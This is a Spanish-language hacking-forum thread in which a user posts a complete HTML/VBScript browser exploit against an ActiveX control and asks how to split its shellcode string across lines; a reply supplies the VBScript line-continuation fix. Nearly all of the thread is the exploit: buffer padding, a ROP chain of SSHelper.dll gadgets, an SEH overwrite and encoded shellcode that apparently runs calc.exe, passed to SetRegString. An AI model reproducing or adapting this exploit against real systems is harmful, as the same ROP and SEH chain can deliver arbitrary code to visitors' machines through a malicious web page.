elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Separar un comando en múltiples líneas en VBSCRIPT
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Separar un comando en múltiples líneas en VBSCRIPT  (Leído 2,479 veces)
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Separar un comando en múltiples líneas en VBSCRIPT
« en: 4 Marzo 2014, 21:58 pm »

Hola a todos tengo el siguiente código pero no logro hacer que quede en líneas diferentes, a ver si me guían, saludos (es exactamente en payload):

Código
  1. <html>
  2. <object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target'></object>
  3. <script language='vbscript'>
  4. junk1 = String(72, "A")
  5. junk2 = String(3184, "B")
  6. junk3 = String(25000, "C")
  7.  
  8. nop1 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  9. nop2 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  10. nop3 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  11. nop4 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  12. nop5 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  13. nop6 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  14. nop7 = unescape("%0c%11%44%06") ' SSHelper.dll | RETN
  15. nop = nop1 + nop2 + nop3 + nop4 + nop5 + nop6 + nop7
  16.  
  17. rop1 = unescape("%33%b6%44%06") ' SSHelper.dll | POP EBP / RETN
  18. rop2 = unescape("%10%c0%1f%06") ' SSHelper.dll
  19. rop3 = unescape("%65%b9%47%06") ' SSHelper.dll | MOV EDX,EBP / POP EDI / POP ESI / POP EBP / POP EBX / POP ECX / RETN
  20. rop4 = unescape("%51%a5%45%06") ' SSHelper.dll | CALL EAX
  21. rop5 = unescape("%ff%ff%ff%ff") ' 0xFFFFFFFF
  22. rop6 = unescape("%6c%c4%24%23") ' 0x2324C46C
  23. rop7 = unescape("%49%cc%ba%f9") ' 0xF9BACC49
  24. rop8 = unescape("%aa%aa%aa%aa") ' 0xAAAAAAAA
  25. rop9 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
  26. rop10 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
  27. rop11 = unescape("%6b%28%44%06") ' SSHelper.dll | XCHG EAX,EBP / RETN
  28. rop12 = unescape("%0e%37%45%06") ' SSHelper.dll | MOV EAX,0x64536B7 / RETN
  29. rop13 = unescape("%d9%c4%47%06") ' SSHelper.dll | ADD EBX,EAX / PUSH 0x1 / POP EAX / RETN
  30. rop14 = unescape("%05%67%47%06") ' SSHelper.dll | POP EAX / RETN
  31. rop15 = unescape("%b0%c3%24%23") ' 0x2324C3B0
  32. rop16 = unescape("%ff%4b%46%06") ' SSHelper.dll | ADD EAX,0x595B5E5F / RETN
  33. rop17 = unescape("%71%03%4a%06") ' SSHelper.dll | PUSHAD / ADD AL,0x0 / RETN
  34. ROPgadgets = nop + rop1 + rop2 + rop3 + rop4 + rop5 + rop6 + rop7 + rop8 + rop9 + rop10 + rop11 + rop12 + rop13 + rop14 + rop15 + rop16 + rop17
  35.  
  36. SEH = unescape("%13%16%47%06") ' SSHelper.dll | ADD ESP,0x46C
  37.  
  38. payload =unescape(
  39. "%fc%e8%89%00%00%00%60%89%e5%31%d2%64%8b%52" & _
  40. "%30%8b%52%0c%8b%52%14%8b%72%28%0f%b7%4a%26" & _
  41. "%31%ff%31%c0%ac%3c%61%7c%02%2c%20%c1%cf%0d" & _
  42. "%01%c7%e2%f0%52%57%8b%52%10%8b%42%3c%01%d0" & _
  43. "%8b%40%78%85%c0%74%4a%01%d0%50%8b%48%18%8b" & _
  44. "%58%20%01%d3%e3%3c%49%8b%34%8b%01%d6%31%ff" & _
  45. "%31%c0%ac%c1%cf%0d%01%c7%38%e0%75%f4%03%7d" & _
  46. "%f8%3b%7d%24%75%e2%58%8b%58%24%01%d3%66%8b" & _
  47. "%0c%4b%8b%58%1c%01%d3%8b%04%8b%01%d0%89%44" & _
  48. "%24%24%5b%5b%61%59%5a%51%ff%e0%58%5f%5a%8b" & _
  49. "%12%eb%86%5d%6a%01%8d%85%b9%00%00%00%50%68" & _
  50. "%31%8b%6f%87%ff%d5%bb%f0%b5%a2%56%68%a6%95" & _
  51. "%bd%9d%ff%d5%3c%06%7c%0a%80%fb%e0%75%05%bb" & _
  52. "%47%13%72%6f%6a%00%53%ff%d5%63%61%6c%63%2e" & _
  53. "%65%78%65%00")
  54.  
  55. arg1 = 1
  56. arg2 = 1
  57. arg3 = junk1 + ROPgadgets + junk2 + SEH + payload + junk3
  58. arg4 = "defaultV"
  59. arg5 = "defaultV"
  60. target.SetRegString arg1, arg2, arg3, arg4, arg5
  61. </script>
  62. </html>


En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.817



Ver Perfil
Re: Separar un comando en múltiples líneas en VBSCRIPT
« Respuesta #1 en: 4 Marzo 2014, 22:24 pm »

Te faltó usar el caracter de continuación de linea al principio:

Código
  1. payload = unescape( _
  2.                   "%fc%e8%89%00%00%00%60%89%e5%31%d2%64%8b%52" & _
  3.                   "%30%8b%52%0c%8b%52%14%8b%72%28%0f%b7%4a%26" & _
  4.                   "%31%ff%31%c0%ac%3c%61%7c%02%2c%20%c1%cf%0d" & _
  5.                   "%01%c7%e2%f0%52%57%8b%52%10%8b%42%3c%01%d0" & _
  6.                   "%8b%40%78%85%c0%74%4a%01%d0%50%8b%48%18%8b" & _
  7.                   "%58%20%01%d3%e3%3c%49%8b%34%8b%01%d6%31%ff" & _
  8.                   "%31%c0%ac%c1%cf%0d%01%c7%38%e0%75%f4%03%7d" & _
  9.                   "%f8%3b%7d%24%75%e2%58%8b%58%24%01%d3%66%8b" & _
  10.                   "%0c%4b%8b%58%1c%01%d3%8b%04%8b%01%d0%89%44" & _
  11.                   "%24%24%5b%5b%61%59%5a%51%ff%e0%58%5f%5a%8b" & _
  12.                   "%12%eb%86%5d%6a%01%8d%85%b9%00%00%00%50%68" & _
  13.                   "%31%8b%6f%87%ff%d5%bb%f0%b5%a2%56%68%a6%95" & _
  14.                   "%bd%9d%ff%d5%3c%06%7c%0a%80%fb%e0%75%05%bb" & _
  15.                   "%47%13%72%6f%6a%00%53%ff%d5%63%61%6c%63%2e" & _
  16.                   "%65%78%65%00" _
  17.                  )

· Statement Breaks in VBScript

Saludos!


« Última modificación: 4 Marzo 2014, 22:33 pm por Eleкtro » En línea

.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Separar un comando en múltiples líneas en VBSCRIPT
« Respuesta #2 en: 5 Marzo 2014, 04:14 am »

Siiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii :D muchas gracias me ahorraste de tener un código de tres metros de ancho, te debo una, saludos :D
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines